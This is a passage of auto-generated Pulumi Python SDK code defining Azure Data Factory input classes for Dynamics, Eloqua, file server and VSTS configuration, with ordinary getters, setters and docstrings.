def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class DynamicsEntityDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
entity_name: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Dynamics entity dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param Any entity_name: The logical name of the entity. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'DynamicsEntity')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if entity_name is not None:
pulumi.set(__self__, "entity_name", entity_name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="entityName")
def entity_name(self) -> Optional[Any]:
"""
The logical name of the entity. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "entity_name")
@entity_name.setter
def entity_name(self, value: Optional[Any]):
pulumi.set(self, "entity_name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class DynamicsLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
deployment_type: pulumi.Input[str],
type: pulumi.Input[str],
username: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
host_name: Optional[Any] = None,
organization_name: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
service_uri: Optional[Any] = None):
"""
Dynamics linked service.
:param pulumi.Input[str] authentication_type: The authentication type to connect to Dynamics server. 'Office365' for online scenario, 'Ifd' for on-premises with Ifd scenario. Type: string (or Expression with resultType string).
:param pulumi.Input[str] deployment_type: The deployment type of the Dynamics instance. 'Online' for Dynamics Online and 'OnPremisesWithIfd' for Dynamics on-premises with Ifd. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param Any username: User name to access the Dynamics instance. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any host_name: The host name of the on-premises Dynamics server. The property is required for on-prem and not allowed for online. Type: string (or Expression with resultType string).
:param Any organization_name: The organization name of the Dynamics instance. The property is required for on-prem and required for online when there are more than one Dynamics instances associated with the user. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to access the Dynamics instance.
:param Any port: The port of on-premises Dynamics server. The property is required for on-prem and not allowed for online. Default is 443. Type: integer (or Expression with resultType integer), minimum: 0.
:param Any service_uri: The URL to the Microsoft Dynamics server. The property is required for on-line and not allowed for on-prem. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "deployment_type", deployment_type)
pulumi.set(__self__, "type", 'Dynamics')
pulumi.set(__self__, "username", username)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if host_name is not None:
pulumi.set(__self__, "host_name", host_name)
if organization_name is not None:
pulumi.set(__self__, "organization_name", organization_name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if service_uri is not None:
pulumi.set(__self__, "service_uri", service_uri)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication type to connect to Dynamics server. 'Office365' for online scenario, 'Ifd' for on-premises with Ifd scenario. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Input[str]:
"""
The deployment type of the Dynamics instance. 'Online' for Dynamics Online and 'OnPremisesWithIfd' for Dynamics on-premises with Ifd. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deployment_type")
@deployment_type.setter
def deployment_type(self, value: pulumi.Input[str]):
pulumi.set(self, "deployment_type", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def username(self) -> Any:
"""
User name to access the Dynamics instance. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Any):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="hostName")
def host_name(self) -> Optional[Any]:
"""
The host name of the on-premises Dynamics server. The property is required for on-prem and not allowed for online. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host_name")
@host_name.setter
def host_name(self, value: Optional[Any]):
pulumi.set(self, "host_name", value)
@property
@pulumi.getter(name="organizationName")
def organization_name(self) -> Optional[Any]:
"""
The organization name of the Dynamics instance. The property is required for on-prem and required for online when there are more than one Dynamics instances associated with the user. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "organization_name")
@organization_name.setter
def organization_name(self, value: Optional[Any]):
pulumi.set(self, "organization_name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to access the Dynamics instance.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The port of on-premises Dynamics server. The property is required for on-prem and not allowed for online. Default is 443. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="serviceUri")
def service_uri(self) -> Optional[Any]:
"""
The URL to the Microsoft Dynamics server. The property is required for on-line and not allowed for on-prem. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_uri")
@service_uri.setter
def service_uri(self, value: Optional[Any]):
pulumi.set(self, "service_uri", value)
@pulumi.input_type
class EloquaLinkedServiceArgs:
def __init__(__self__, *,
endpoint: Any,
type: pulumi.Input[str],
username: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Eloqua server linked service.
:param Any endpoint: The endpoint of the Eloqua server. (i.e. eloqua.example.com)
:param pulumi.Input[str] type: Type of linked service.
:param Any username: The site name and user name of your Eloqua account in the form: sitename/username. (i.e. Eloqua/Alice)
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'Eloqua')
pulumi.set(__self__, "username", username)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the Eloqua server. (i.e. eloqua.example.com)
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def username(self) -> Any:
"""
The site name and user name of your Eloqua account in the form: sitename/username. (i.e. Eloqua/Alice)
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Any):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class EloquaObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Eloqua server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'EloquaObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class EntityReferenceArgs:
def __init__(__self__, *,
reference_name: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
The entity reference.
:param pulumi.Input[str] reference_name: The name of this referenced entity.
:param pulumi.Input[str] type: The type of this referenced entity.
"""
if reference_name is not None:
pulumi.set(__self__, "reference_name", reference_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of this referenced entity.
"""
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of this referenced entity.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ExecutionActivityArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
type: pulumi.Input[str],
depends_on: Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]] = None,
description: Optional[pulumi.Input[str]] = None,
linked_service_name: Optional[pulumi.Input['LinkedServiceReferenceArgs']] = None,
policy: Optional[pulumi.Input['ActivityPolicyArgs']] = None):
"""
Base class for all execution activities.
:param pulumi.Input[str] name: Activity name.
:param pulumi.Input[str] type: Type of activity.
:param pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]] depends_on: Activity depends on condition.
:param pulumi.Input[str] description: Activity description.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input['ActivityPolicyArgs'] policy: Activity policy.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", 'Execution')
if depends_on is not None:
pulumi.set(__self__, "depends_on", depends_on)
if description is not None:
pulumi.set(__self__, "description", description)
if linked_service_name is not None:
pulumi.set(__self__, "linked_service_name", linked_service_name)
if policy is not None:
pulumi.set(__self__, "policy", policy)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Activity name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of activity.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="dependsOn")
def depends_on(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]]:
"""
Activity depends on condition.
"""
return pulumi.get(self, "depends_on")
@depends_on.setter
def depends_on(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]]):
pulumi.set(self, "depends_on", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Activity description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> Optional[pulumi.Input['LinkedServiceReferenceArgs']]:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: Optional[pulumi.Input['LinkedServiceReferenceArgs']]):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def policy(self) -> Optional[pulumi.Input['ActivityPolicyArgs']]:
"""
Activity policy.
"""
return pulumi.get(self, "policy")
@policy.setter
def policy(self, value: Optional[pulumi.Input['ActivityPolicyArgs']]):
pulumi.set(self, "policy", value)
@pulumi.input_type
class FactoryIdentityArgs:
def __init__(__self__, *,
type: pulumi.Input[str]):
"""
Identity properties of the factory resource.
:param pulumi.Input[str] type: The identity type. Currently the only supported type is 'SystemAssigned'.
"""
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The identity type. Currently the only supported type is 'SystemAssigned'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class FactoryVSTSConfigurationArgs:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
collaboration_branch: Optional[pulumi.Input[str]] = None,
last_commit_id: Optional[pulumi.Input[str]] = None,
project_name: Optional[pulumi.Input[str]] = None,
repository_name: Optional[pulumi.Input[str]] = None,
root_folder: Optional[pulumi.Input[str]] = None,
tenant_id: Optional[pulumi.Input[str]] = None):
"""
Factory's VSTS repo information.
:param pulumi.Input[str] account_name: VSTS account name.
:param pulumi.Input[str] collaboration_branch: VSTS collaboration branch.
:param pulumi.Input[str] last_commit_id: VSTS last commit id.
:param pulumi.Input[str] project_name: VSTS project name.
:param pulumi.Input[str] repository_name: VSTS repository name.
:param pulumi.Input[str] root_folder: VSTS root folder.
:param pulumi.Input[str] tenant_id: VSTS tenant id.
"""
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if collaboration_branch is not None:
pulumi.set(__self__, "collaboration_branch", collaboration_branch)
if last_commit_id is not None:
pulumi.set(__self__, "last_commit_id", last_commit_id)
if project_name is not None:
pulumi.set(__self__, "project_name", project_name)
if repository_name is not None:
pulumi.set(__self__, "repository_name", repository_name)
if root_folder is not None:
pulumi.set(__self__, "root_folder", root_folder)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
"""
VSTS account name.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="collaborationBranch")
def collaboration_branch(self) -> Optional[pulumi.Input[str]]:
"""
VSTS collaboration branch.
"""
return pulumi.get(self, "collaboration_branch")
@collaboration_branch.setter
def collaboration_branch(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "collaboration_branch", value)
@property
@pulumi.getter(name="lastCommitId")
def last_commit_id(self) -> Optional[pulumi.Input[str]]:
"""
VSTS last commit id.
"""
return pulumi.get(self, "last_commit_id")
@last_commit_id.setter
def last_commit_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_commit_id", value)
@property
@pulumi.getter(name="projectName")
def project_name(self) -> Optional[pulumi.Input[str]]:
"""
VSTS project name.
"""
return pulumi.get(self, "project_name")
@project_name.setter
def project_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_name", value)
@property
@pulumi.getter(name="repositoryName")
def repository_name(self) -> Optional[pulumi.Input[str]]:
"""
VSTS repository name.
"""
return pulumi.get(self, "repository_name")
@repository_name.setter
def repository_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repository_name", value)
@property
@pulumi.getter(name="rootFolder")
def root_folder(self) -> Optional[pulumi.Input[str]]:
"""
VSTS root folder.
"""
return pulumi.get(self, "root_folder")
@root_folder.setter
def root_folder(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "root_folder", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
VSTS tenant id.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@pulumi.input_type
class FileServerLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_id: Optional[Any] = None):
"""
File system linked service.
:param Any host: Host name of the server. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to logon the server.
:param Any user_id: User ID to logon the server. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "host", host)
